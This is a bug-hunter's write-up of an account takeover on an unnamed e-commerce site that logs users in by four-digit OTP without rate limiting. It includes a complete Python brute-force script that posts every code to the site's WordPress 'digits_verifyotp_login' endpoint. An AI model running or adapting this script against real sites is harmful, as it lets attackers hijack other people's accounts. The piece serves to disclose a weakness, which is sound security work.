OTP Bruteforce Account Takeover Writeup
A creative Bug hunter who interested in blockchain and Security
This post is about How I could take over any account of an E-commerce company (we call it target.com).
In this case, we can register with “phone number and email”.
While registering with a phone number, you need to enter your phone number and then the website will send the OTP code, so you need to verify it.
After registration, your default username is Your phone number (if you registered with an email, your email address As your Default username).
when you want to comment on some post on target.com, people can see your “Phone number OR Email Address” and You don’t need a password on the login page because the login method is OTP verification.
After reviewing the requests and testing the wrong OTP code, I found the admin-ajax.php and found that this address has no restrictions for testing the OTP code.
Since the OTP code was four digits, I make a simple python script and generated the code:
file = open("otpcode.txt",'w')
otp_generator = 0
while otp_generator != 9999 :
# print(format(otp_generator,'04'))
otp_generator+=1
file.write(str(format(otp_generator,'04'))+'\n')
file.close()
print('Finish')
And then I write a simple python script with the requests library and performed the brute force operation (Note: this script without Multithread takes a long time, it is better to use Multithread or we can use burp intruder).
import requests
url = "https://target.com/wp-admin/admin-ajax.php"
file = open('otpcode-tmp.txt','r')
for otp_code in file.read().split('\n'):
rdata = {
"action": "digits_verifyotp_login",
"countrycode": "+98",
"mobileNo": "912+345+6789",
"otp": otp_code,
"dig_ftoken": "-1",
"csrf": "24011e132f",
"dtype": "1",
"digits": "1",
"rememberMe": "false"
}
tmp = requests.post(url,data=rdata)
tmp = tmp.json()
if tmp['success'] == True:
print('OTP code is : '+str(rdata['otp']))
break
# print("False: "+otp_code)
print('Finish')
I hope you enjoyed reading this Write Up :)
